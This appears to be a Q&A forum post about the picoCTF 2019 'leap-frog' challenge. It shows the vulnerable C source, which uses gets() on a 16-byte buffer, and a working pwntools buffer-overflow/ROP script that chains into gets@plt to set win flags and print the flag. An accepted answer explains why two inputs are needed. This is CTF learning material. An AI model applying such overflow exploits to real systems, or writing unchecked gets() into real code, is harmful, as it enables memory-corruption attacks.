# Why does this exploit require two separate payload injections rather than one?

Tags: c, exploit, gets, ctf

I am new to binary exploitation problems. This one comes from picoctf 2019, leap-frog. The particular solution I'm interested in uses a buffer overflow on the vuln() function to force execution to return to gets' PLT entry. This is done because gets allows us to write to an arbitrary place in memory (see [link](https://en.cppreference.com/w/c/io/gets)). We are interested in writing to `win1`, `win2`, and `win3`. If we can set each of these to true, then we can print the flag! So, all we need to exploit the program is the `buffer + address_gets_plt + address_flag + address_win1 + values_for_win_vartiables`.

## Source

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>


#define FLAG_SIZE 64

bool win1 = false;
bool win2 = false;
bool win3 = false;

void leapA() {
  win1 = true;
}

void leap2(unsigned int arg_check) {
  if (win3 && arg_check == 0xDEADBEEF) {
    win2 = true;
  }
  else if (win3) {
    printf("Wrong Argument. Try Again.\n");
  }
  else {
    printf("Nope. Try a little bit harder.\n");
  }
}

void leap3() {
  if (win1 && !win1) {
    win3 = true;
  }
  else {
    printf("Nope. Try a little bit harder.\n");
  }
}

void display_flag() {
  char flag[FLAG_SIZE];
  FILE *file;
  file = fopen("flag.txt", "r");
  if (file == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }

  fgets(flag, sizeof(flag), file);
  
  if (win1 && win2 && win3) {
    printf("%s", flag);
    return;
  }
  else if (win1 || win3) {
    printf("Nice Try! You're Getting There!\n");
  }
  else {
    printf("You won't get the flag that easy..\n");
  }
}

void vuln() {
  char buf[16];
  printf("Enter your input> ");
  return gets(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  vuln();
}
```

The following script prints the flag when run in the CTF's shell

## Solution Script

```
from pwn import *

payload = ('A'*28) + p32(0x08048430)  + p32(0x80486b3) + p32(0x0804a03d)
#       =          + address_gets_plt + address_flag   + address_win1
try:
    p = process('./rop')
    p.recvuntil('> ')
    p.sendline(payload)
    p.sendline('\x01\x01\x01\x00')  # sets win1, win2, win3 to true via gets reading from stdin
    print('Flag: ' + p.recvuntil('}'))
    break
except:
    p.close()
```

The following script does *NOT* work, yet the only difference between the programs is this one merges the `sendline()` calls. I am guessing this is because the program did not reach the call to gets yet, so it is not ready for input from stdin.

## Failed Solution 1

```
from pwn import *

payload = ('A'*28) + p32(0x08048430)  + p32(0x80486b3) + p32(0x0804a03d)
#       =          + address_gets_plt + address_flag   + address_win1
try:
    p = process('./rop')
    p.recvuntil('> ')
    p.sendline(payload+'\x01\x01\x01\x00')
    print('Flag: ' + p.recvuntil('}'))
    break
except:
    p.close()
```

## Failed Solution 2

Then, I tried to run the program without appending `'\x01\x01\x01\x00\'` to the `payload`, hoping execution would hit gets and wait for stdin input; however, I instead get a segfault. What is wrong with my logic for these two failed solutions? Thanks!

Answer (score 3, accepted):

You need two different payloads, because there a two different calls to `gets()`. `sendline()` appends a newline to your input/payload [[1](https://docs.pwntools.com/en/stable/tubes.html#pwnlib.tubes.tube.tube.sendline)], and `gets()` reads input until a newline is read [[2](https://linux.die.net/man/3/gets)]. So, one `sendline()` feeds only one `gets()`.

Why are there two calls to `gets()`? Well, the **first call** to `gets()` happens in the `vuln()` function, and has the purpose of altering the execution flow. If you run the program, `gets()` asks for user input and stores it in `buf[16]` on the stack. And because `gets()` doesn't check for buffer overruns [[2](https://linux.die.net/man/3/gets)], you can actually corrupt the stack by inserting an input that is bigger than 16 bytes. So the first `sendline()` feeds the payload `('A'*28) + p32(0x08048430)  + p32(0x80486b3) + p32(0x0804a03d)` to the first call. This corrupts the stack and alters the execution flow. The first address `0x08048430` in the payload (address of `gets@plt`) manipulates the return address of the first `gets()`. So when the first `gets()` finishes execution, it jumps to second `gets()`. This is the **second call** to `gets()`. The second address `0x80486b3` (address of `display_flag()`) is the return address of the second `gets()`. So when the second call leaves, it jumps to `display_flag()`. The third address `0x0804a03d` (address of the `win1` variable) is the buffer for the second `gets()`. So the second `gets()` expects another input/payload from the user and writes it to the address of `win1`. The second input is served by the second `sendline()`.

Your first solution fails, because you feed only the first `gets()` call, so the second `gets()` call has no input at all. Your second solution fails for the same reason.

Comment: It should be noted that the second solution fails because `stdin` gets closed and `gets` will just read in an empty string. If `p.interactive` was called then there wouldn't have been a segfault.